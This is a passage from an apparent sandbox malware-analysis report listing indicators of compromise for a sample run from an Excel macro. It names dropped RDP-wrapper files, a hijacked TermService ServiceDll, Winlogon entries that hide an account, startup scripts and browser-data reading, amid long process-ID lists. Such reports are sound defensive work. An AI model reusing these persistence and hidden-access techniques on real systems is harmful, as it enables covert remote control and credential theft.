LkAnJ.exe 2480 LkAnJ.exe 1656 images.exe 1656 images.exe 1656 images.exe 1656 images.exe 1656 images.exe 1656 images.exe 2560 LkAnJ.exe 2592 LkAnJ.exe 2592 LkAnJ.exe 2732 LkAnJ.exe 392 LkAnJ.exe 392 LkAnJ.exe 2764 LkAnJ.exe 2788 LkAnJ.exe 2788 LkAnJ.exe 2900 LkAnJ.exe 2860 LkAnJ.exe 2860 LkAnJ.exe 2992 LkAnJ.exe 2952 LkAnJ.exe 2952 LkAnJ.exe 576 LkAnJ.exe 3040 LkAnJ.exe 3040 LkAnJ.exe 2136 LkAnJ.exe 2056 LkAnJ.exe 2056 LkAnJ.exe 2128 LkAnJ.exe 2172 LkAnJ.exe 2172 LkAnJ.exe 2308 LkAnJ.exe 2268 LkAnJ.exe 2268 LkAnJ.exe 2516 LkAnJ.exe 2568 LkAnJ.exe 2568 LkAnJ.exe 2596 LkAnJ.exe 2560 LkAnJ.exe 2560 LkAnJ.exe 2720 LkAnJ.exe 2732 LkAnJ.exe 2732 LkAnJ.exe 2784 LkAnJ.exe 2012 LkAnJ.exe 2012 LkAnJ.exe 2868 LkAnJ.exe 2876 LkAnJ.exe 2876 LkAnJ.exe 1664 LkAnJ.exe 2948 LkAnJ.exe 2948 LkAnJ.exe 576 LkAnJ.exe 2000 LkAnJ.exe 2000 LkAnJ.exe 2096 LkAnJ.exe 2232 LkAnJ.exe 2232 LkAnJ.exe 2152 LkAnJ.exe 2244 LkAnJ.exe 2244 LkAnJ.exe 2324 LkAnJ.exe 2504 LkAnJ.exe 2504 LkAnJ.exe 2516 LkAnJ.exe 2536 LkAnJ.exe 2536 LkAnJ.exe 2652 LkAnJ.exe 2760 LkAnJ.exe 2760 LkAnJ.exe 2808 LkAnJ.exe 2764 LkAnJ.exe 2764 LkAnJ.exe 2832 LkAnJ.exe 2848 LkAnJ.exe 2848 LkAnJ.exe 2964 LkAnJ.exe 1356 LkAnJ.exe 1356 LkAnJ.exe 3004 LkAnJ.exe 1836 LkAnJ.exe 1836 LkAnJ.exe 2080 LkAnJ.exe 1584 LkAnJ.exe 1584 LkAnJ.exe 1688 LkAnJ.exe 1452 LkAnJ.exe 1452 LkAnJ.exe 2320 LkAnJ.exe 2440 LkAnJ.exe 2440 LkAnJ.exe 2588 LkAnJ.exe 2572 LkAnJ.exe 2572 LkAnJ.exe 2736 LkAnJ.exe 2708 LkAnJ.exe 2708 LkAnJ.exe 2720 LkAnJ.exe 1960 LkAnJ.exe 1960 LkAnJ.exe 2904 LkAnJ.exe 2944 LkAnJ.exe 2944 LkAnJ.exe 2964 LkAnJ.exe 3016 LkAnJ.exe 3016 LkAnJ.exe 1056 LkAnJ.exe 340 LkAnJ.exe 340 LkAnJ.exe 820 LkAnJ.exe 816 LkAnJ.exe 816 LkAnJ.exe 2184 LkAnJ.exe 2284 LkAnJ.exe 2284 LkAnJ.exe 2320 LkAnJ.exe 2316 LkAnJ.exe 2316 LkAnJ.exe 2588 LkAnJ.exe 1800 LkAnJ.exe 1800 LkAnJ.exe 2736 LkAnJ.exe 1420 LkAnJ.exe 1420 LkAnJ.exe 2768 LkAnJ.exe 2824 LkAnJ.exe 2824 LkAnJ.exe 2912 LkAnJ.exe 2940 LkAnJ.exe 2940 LkAnJ.exe 3032 LkAnJ.exe 324 LkAnJ.exe 324 LkAnJ.exe 340 LkAnJ.exe 2132 LkAnJ.exe 2132 LkAnJ.exe 2416 LkAnJ.exe 668 LkAnJ.exe 668 LkAnJ.exe 2328 LkAnJ.exe 2308 LkAnJ.exe 2308 LkAnJ.exe 2440 LkAnJ.exe 2576 LkAnJ.exe 2576 LkAnJ.exe 2608 LkAnJ.exe 1428 LkAnJ.exe 1428 LkAnJ.exe 2884 LkAnJ.exe 2788 LkAnJ.exe 2788 LkAnJ.exe 2992 LkAnJ.exe 2980 LkAnJ.exe 2980 LkAnJ.exe 3068 LkAnJ.exe 3056 LkAnJ.exe 3056 LkAnJ.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\rfxvmt.dll images.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\ProgramData:ApplicationData LkAnJ.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Microsoft DN1\sqlmap.dll images.exe File created C:\Program Files\Microsoft DN1\rdpwrap.ini images.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 608 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 452 608 cmd.exe 23 -
Modifies service 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\Microsoft DN1\\sqlmap.dll" images.exe -
Suspicious behavior: MapViewOfSection 100 IoCs
pid Process 1312 LkAnJ.exe 1884 images.exe 1644 LkAnJ.exe 2044 LkAnJ.exe 1056 LkAnJ.exe 1588 LkAnJ.exe 2044 LkAnJ.exe 1696 LkAnJ.exe 1980 LkAnJ.exe 1816 LkAnJ.exe 1184 LkAnJ.exe 1232 LkAnJ.exe 2040 LkAnJ.exe 1836 LkAnJ.exe 1680 LkAnJ.exe 1252 LkAnJ.exe 1544 LkAnJ.exe 304 LkAnJ.exe 1768 LkAnJ.exe 1592 LkAnJ.exe 756 LkAnJ.exe 1816 LkAnJ.exe 1516 LkAnJ.exe 616 LkAnJ.exe 1052 LkAnJ.exe 1176 LkAnJ.exe 784 LkAnJ.exe 1784 LkAnJ.exe 552 LkAnJ.exe 1616 LkAnJ.exe 1412 LkAnJ.exe 1844 LkAnJ.exe 2020 LkAnJ.exe 1856 LkAnJ.exe 1772 LkAnJ.exe 2064 LkAnJ.exe 2156 LkAnJ.exe 2248 LkAnJ.exe 2436 LkAnJ.exe 2532 LkAnJ.exe 2632 LkAnJ.exe 2724 LkAnJ.exe 2816 LkAnJ.exe 2908 LkAnJ.exe 3000 LkAnJ.exe 324 LkAnJ.exe 2148 LkAnJ.exe 2240 LkAnJ.exe 2292 LkAnJ.exe 2480 LkAnJ.exe 2592 LkAnJ.exe 392 LkAnJ.exe 2788 LkAnJ.exe 2860 LkAnJ.exe 2952 LkAnJ.exe 3040 LkAnJ.exe 2056 LkAnJ.exe 2172 LkAnJ.exe 2268 LkAnJ.exe 2568 LkAnJ.exe 2560 LkAnJ.exe 2732 LkAnJ.exe 2012 LkAnJ.exe 2876 LkAnJ.exe 2948 LkAnJ.exe 2000 LkAnJ.exe 2232 LkAnJ.exe 2244 LkAnJ.exe 2504 LkAnJ.exe 2536 LkAnJ.exe 2760 LkAnJ.exe 2764 LkAnJ.exe 2848 LkAnJ.exe 1356 LkAnJ.exe 1836 LkAnJ.exe 1584 LkAnJ.exe 1452 LkAnJ.exe 2440 LkAnJ.exe 2572 LkAnJ.exe 2708 LkAnJ.exe 1960 LkAnJ.exe 2944 LkAnJ.exe 3016 LkAnJ.exe 340 LkAnJ.exe 816 LkAnJ.exe 2284 LkAnJ.exe 2316 LkAnJ.exe 1800 LkAnJ.exe 1420 LkAnJ.exe 2824 LkAnJ.exe 2940 LkAnJ.exe 324 LkAnJ.exe 2132 LkAnJ.exe 668 LkAnJ.exe 2308 LkAnJ.exe 2576 LkAnJ.exe 1428 LkAnJ.exe 2788 LkAnJ.exe 2980 LkAnJ.exe 3056 LkAnJ.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Office loads VBA resources, possible macro or embedded object present
-
Drops startup file 33 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat LkAnJ.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start LkAnJ.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pdf.vbs notepad.exe -
Modifies WinLogon 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts images.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\.p.C..e = "0" images.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" images.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList images.exe -
Suspicious behavior: EnumeratesProcesses 2526 IoCs
pid Process 792 powershell.exe 792 powershell.exe 1312 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1352 LkAnJ.exe 1884 images.exe 1644 LkAnJ.exe 1940 images.exe 1940 images.exe 1940 images.exe 1940 images.exe 1964 LkAnJ.exe 1964 LkAnJ.exe 1940 images.exe 1964 LkAnJ.exe 1940 images.exe 1964 LkAnJ.exe 1940 images.exe 1964 LkAnJ.exe 1940 images.exe 1964 LkAnJ.exe 1940 images.exe 1964 LkAnJ.exe 1940 images.exe 1964 LkAnJ.exe 1940 images.exe 1964 LkAnJ.exe 1840 powershell.exe 1940 images.exe 1964 LkAnJ.exe 1940 images.exe 1964 LkAnJ.exe 1940 images.exe 1964 LkAnJ.exe 2044 LkAnJ.exe 1940 images.exe 1940 images.exe 340 LkAnJ.exe 340 LkAnJ.exe 1940 images.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 652 powershell.exe 1940 images.exe 340 LkAnJ.exe 1840 powershell.exe 1940 images.exe 340 LkAnJ.exe 340 LkAnJ.exe 652 powershell.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1056 LkAnJ.exe 1940 images.exe 1940 images.exe 1940 images.exe 1520 LkAnJ.exe 1520 LkAnJ.exe 1940 images.exe 1520 LkAnJ.exe 1940 images.exe 1520 LkAnJ.exe 1940 images.exe 1520 LkAnJ.exe 1940 images.exe 1940 images.exe 1520 LkAnJ.exe 1940 images.exe 1520 LkAnJ.exe 1940 images.exe 1520 LkAnJ.exe 1940 images.exe 1520 LkAnJ.exe 1520 LkAnJ.exe 1940 images.exe 1520 LkAnJ.exe 1940 images.exe 1588 LkAnJ.exe 1940 images.exe 1940 images.exe 1940 images.exe 1940 images.exe 1172 LkAnJ.exe 1172 LkAnJ.exe 1940 images.exe 1172 LkAnJ.exe 1940 images.exe 1172 LkAnJ.exe 1940 images.exe 1172 LkAnJ.exe 1940 images.exe 1172 LkAnJ.exe 1940 images.exe 1172 LkAnJ.exe 1940 images.exe 1172 LkAnJ.exe 1940 images.exe 1172 LkAnJ.exe 1940 images.exe 1172 LkAnJ.exe 1940 images.exe 1172 LkAnJ.exe 1940 images.exe 1940 images.exe 1172 LkAnJ.exe 1940 images.exe 1172 LkAnJ.exe 2044 LkAnJ.exe 1940 images.exe 1940 images.exe 1940 images.exe 1488 LkAnJ.exe 1488 LkAnJ.exe 1940 images.exe 1488 LkAnJ.exe 1940 images.exe 1488 LkAnJ.exe 1940 images.exe 1488 LkAnJ.exe 1940 images.exe 1488 LkAnJ.exe 1940 images.exe 1488 LkAnJ.exe 1940 images.exe 1488 LkAnJ.exe 1940 images.exe 1488 LkAnJ.exe 1940 images.exe 1488 LkAnJ.exe 1940 images.exe 1696 LkAnJ.exe 1940 images.exe 1940 images.exe 1940 images.exe 1132 LkAnJ.exe 1132 LkAnJ.exe 1940 images.exe 1132 LkAnJ.exe 1940 images.exe 1132 LkAnJ.exe 1940 images.exe 1132 LkAnJ.exe 1940 images.exe 1132 LkAnJ.exe 1940 images.exe 1132 LkAnJ.exe 1940 images.exe 1132 LkAnJ.exe 1940 images.exe 1132 LkAnJ.exe 1940 images.exe 1132 LkAnJ.exe 1940 images.exe 1980 LkAnJ.exe 1940 images.exe 1940 images.exe 1836 LkAnJ.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1816 LkAnJ.exe 1940 images.exe 1940 images.exe 788 LkAnJ.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 1940 images.exe 788 LkAnJ.exe 788 LkAnJ.exe 1940 images.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 1184 LkAnJ.exe 1940 images.exe 1056 LkAnJ.exe 1056 LkAnJ.exe 1940 images.exe 1056 LkAnJ.exe 1940 images.exe 1056 LkAnJ.exe 1940 images.exe 1056 LkAnJ.exe 1940 images.exe 1056 LkAnJ.exe 1940 images.exe 1056 LkAnJ.exe 1940 images.exe 1056 LkAnJ.exe 1940 images.exe 1056 LkAnJ.exe 1940 images.exe 1056 LkAnJ.exe 1940 images.exe 1056 LkAnJ.exe 1940 images.exe 1056 LkAnJ.exe 1940 images.exe 1232 LkAnJ.exe 1940 images.exe 1940 images.exe 1548 LkAnJ.exe 1548 LkAnJ.exe 1940 images.exe 1548 LkAnJ.exe 1940 images.exe 1548 LkAnJ.exe 1940 images.exe 1548 LkAnJ.exe 1940 images.exe 1548 LkAnJ.exe 1940 images.exe 1548 LkAnJ.exe 1940 images.exe 1548 LkAnJ.exe 1940 images.exe 1548 LkAnJ.exe 1940 images.exe 1548 LkAnJ.exe 1940 images.exe 1548 LkAnJ.exe 1940 images.exe 1548 LkAnJ.exe 1940 images.exe 1548 LkAnJ.exe 1940 images.exe 2040 LkAnJ.exe 1940 images.exe 1908 LkAnJ.exe 1908 LkAnJ.exe 1940 images.exe 1908 LkAnJ.exe 1940 images.exe 1908 LkAnJ.exe 1940 images.exe 1908 LkAnJ.exe 1940 images.exe 1908 LkAnJ.exe 1940 images.exe 1908 LkAnJ.exe 1940 images.exe 1908 LkAnJ.exe 1940 images.exe 1908 LkAnJ.exe 1940 images.exe 1908 LkAnJ.exe 1940 images.exe 1908 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1940 images.exe 1496 LkAnJ.exe 1496 LkAnJ.exe 1940 images.exe 1496 LkAnJ.exe 1940 images.exe 1496 LkAnJ.exe 1940 images.exe 1496 LkAnJ.exe 1940 images.exe 1496 LkAnJ.exe 1940 images.exe 1496 LkAnJ.exe 1940 images.exe 1496 LkAnJ.exe 1940 images.exe 1496 LkAnJ.exe 1940 images.exe 1496 LkAnJ.exe 1940 images.exe 1496 LkAnJ.exe 1940 images.exe 1496 LkAnJ.exe 1940 images.exe 1680 LkAnJ.exe 1940 images.exe 480 LkAnJ.exe 480 LkAnJ.exe 1940 images.exe 480 LkAnJ.exe 1940 images.exe 480 LkAnJ.exe 1940 images.exe 480 LkAnJ.exe 1940 images.exe 480 LkAnJ.exe 1940 images.exe 480 LkAnJ.exe 1940 images.exe 480 LkAnJ.exe 1940 images.exe 480 LkAnJ.exe 1940 images.exe 480 LkAnJ.exe 1940 images.exe 480 LkAnJ.exe 1940 images.exe 1252 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1544 LkAnJ.exe 1940 images.exe 1940 images.exe 1552 LkAnJ.exe 1552 LkAnJ.exe 1940 images.exe 1552 LkAnJ.exe 1940 images.exe 1552 LkAnJ.exe 1940 images.exe 1552 LkAnJ.exe 1940 images.exe 1552 LkAnJ.exe 1940 images.exe 1552 LkAnJ.exe 1940 images.exe 1552 LkAnJ.exe 1940 images.exe 1552 LkAnJ.exe 1940 images.exe 1552 LkAnJ.exe 1940 images.exe 1552 LkAnJ.exe 1940 images.exe 1552 LkAnJ.exe 1940 images.exe 1552 LkAnJ.exe 1940 images.exe 304 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 1768 LkAnJ.exe 1940 images.exe 1940 images.exe 1724 LkAnJ.exe 1724 LkAnJ.exe 1940 images.exe 1724 LkAnJ.exe 1940 images.exe 1724 LkAnJ.exe 1940 images.exe 1724 LkAnJ.exe 1940 images.exe 1724 LkAnJ.exe 1940 images.exe 1724 LkAnJ.exe 1940 images.exe 1724 LkAnJ.exe 1940 images.exe 1724 LkAnJ.exe 1940 images.exe 1724 LkAnJ.exe 1940 images.exe 1724 LkAnJ.exe 1940 images.exe 1724 LkAnJ.exe 1940 images.exe 1592 LkAnJ.exe 1940 images.exe 1940 images.exe 1940 images.exe 2036 LkAnJ.exe 2036 LkAnJ.exe 1940 images.exe 2036 LkAnJ.exe 1940 images.exe 2036 LkAnJ.exe 2036 LkAnJ.exe 1940 images.exe 1940 images.exe 2036 LkAnJ.exe 2036 LkAnJ.exe 1940 images.exe 2036 LkAnJ.exe 1940 images.exe 1940 images.exe 2036 LkAnJ.exe 2036 LkAnJ.exe 1940 images.exe 2036 LkAnJ.exe 1940 images.exe 2036 LkAnJ.exe 1940 images.exe 1940 images.exe 756 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1836 LkAnJ.exe 1940 images.exe 1816 LkAnJ.exe 1940 images.exe 1784 LkAnJ.exe 1784 LkAnJ.exe 1940 images.exe 1784 LkAnJ.exe 1940 images.exe 1784 LkAnJ.exe 1940 images.exe 1784 LkAnJ.exe 1940 images.exe 1784 LkAnJ.exe 1940 images.exe 1784 LkAnJ.exe 1940 images.exe 1784 LkAnJ.exe 1940 images.exe 1784 LkAnJ.exe 1940 images.exe 1784 LkAnJ.exe 1940 images.exe 1784 LkAnJ.exe 1940 images.exe 1516 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 616 LkAnJ.exe 1940 images.exe 1940 images.exe 1912 LkAnJ.exe 1912 LkAnJ.exe 1940 images.exe 1912 LkAnJ.exe 1940 images.exe 1912 LkAnJ.exe 1940 images.exe 1912 LkAnJ.exe 1940 images.exe 1912 LkAnJ.exe 1940 images.exe 1912 LkAnJ.exe 1940 images.exe 1912 LkAnJ.exe 1940 images.exe 1912 LkAnJ.exe 1940 images.exe 1912 LkAnJ.exe 1940 images.exe 1912 LkAnJ.exe 1940 images.exe 1912 LkAnJ.exe 1940 images.exe 1052 LkAnJ.exe 1940 images.exe 1940 images.exe 1760 LkAnJ.exe 1760 LkAnJ.exe 1940 images.exe 1760 LkAnJ.exe 1940 images.exe 1760 LkAnJ.exe 1940 images.exe 1760 LkAnJ.exe 1940 images.exe 1760 LkAnJ.exe 1940 images.exe 1760 LkAnJ.exe 1940 images.exe 1760 LkAnJ.exe 1940 images.exe 1760 LkAnJ.exe 1940 images.exe 1760 LkAnJ.exe 1940 images.exe 1760 LkAnJ.exe 1940 images.exe 1760 LkAnJ.exe 1940 images.exe 1176 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 452 LkAnJ.exe 1940 images.exe 784 LkAnJ.exe 1940 images.exe 1940 images.exe 1228 LkAnJ.exe 1228 LkAnJ.exe 1940 images.exe 1228 LkAnJ.exe 1940 images.exe 1228 LkAnJ.exe 1940 images.exe 1228 LkAnJ.exe 1940 images.exe 1228 LkAnJ.exe 1940 images.exe 1228 LkAnJ.exe 1940 images.exe 1228 LkAnJ.exe 1940 images.exe 1228 LkAnJ.exe 1940 images.exe 1228 LkAnJ.exe 1940 images.exe 1228 LkAnJ.exe 1940 images.exe 1784 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 552 LkAnJ.exe 1940 images.exe 1940 images.exe 340 LkAnJ.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 1940 images.exe 1616 LkAnJ.exe 1940 images.exe 1940 images.exe 1772 LkAnJ.exe 1772 LkAnJ.exe 1940 images.exe 1772 LkAnJ.exe 1940 images.exe 1772 LkAnJ.exe 1940 images.exe 1772 LkAnJ.exe 1940 images.exe 1772 LkAnJ.exe 1940 images.exe 1772 LkAnJ.exe 1940 images.exe 1772 LkAnJ.exe 1940 images.exe 1772 LkAnJ.exe 1940 images.exe 1772 LkAnJ.exe 1940 images.exe 1772 LkAnJ.exe 1940 images.exe 1772 LkAnJ.exe 1940 images.exe 1772 LkAnJ.exe 1940 images.exe 1412 LkAnJ.exe 1940 images.exe 1940 images.exe 788 LkAnJ.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 788 LkAnJ.exe 1940 images.exe 1844 LkAnJ.exe 1940 images.exe 1940 images.exe 2000 LkAnJ.exe 2000 LkAnJ.exe 1940 images.exe 2000 LkAnJ.exe 1940 images.exe 2000 LkAnJ.exe 1940 images.exe 2000 LkAnJ.exe 1940 images.exe 2000 LkAnJ.exe 1940 images.exe 2000 LkAnJ.exe 1940 images.exe 2000 LkAnJ.exe 1940 images.exe 2000 LkAnJ.exe 1940 images.exe 2000 LkAnJ.exe 1940 images.exe 2000 LkAnJ.exe 1940 images.exe 2000 LkAnJ.exe 1940 images.exe 2000 LkAnJ.exe 1940 images.exe 2020 LkAnJ.exe 1940 images.exe 1160 LkAnJ.exe 1160 LkAnJ.exe 1940 images.exe 1160 LkAnJ.exe 1940 images.exe 1160 LkAnJ.exe 1940 images.exe 1160 LkAnJ.exe 1940 images.exe 1160 LkAnJ.exe 1940 images.exe 1160 LkAnJ.exe 1940 images.exe 1160 LkAnJ.exe 1940 images.exe 1160 LkAnJ.exe 1940 images.exe 1160 LkAnJ.exe 1940 images.exe 1160 LkAnJ.exe 1940 images.exe 1160 LkAnJ.exe 1940 images.exe 1856 LkAnJ.exe 1940 images.exe 1632 LkAnJ.exe 1632 LkAnJ.exe 1940 images.exe 1632 LkAnJ.exe 1940 images.exe 1632 LkAnJ.exe 1940 images.exe 1632 LkAnJ.exe 1940 images.exe 1632 LkAnJ.exe 1940 images.exe 1632 LkAnJ.exe 1940 images.exe 1632 LkAnJ.exe 1940 images.exe 1632 LkAnJ.exe 1940 images.exe 1632 LkAnJ.exe 1940 images.exe 1632 LkAnJ.exe 1940 images.exe 1632 LkAnJ.exe 1940 images.exe 1940 images.exe 1772 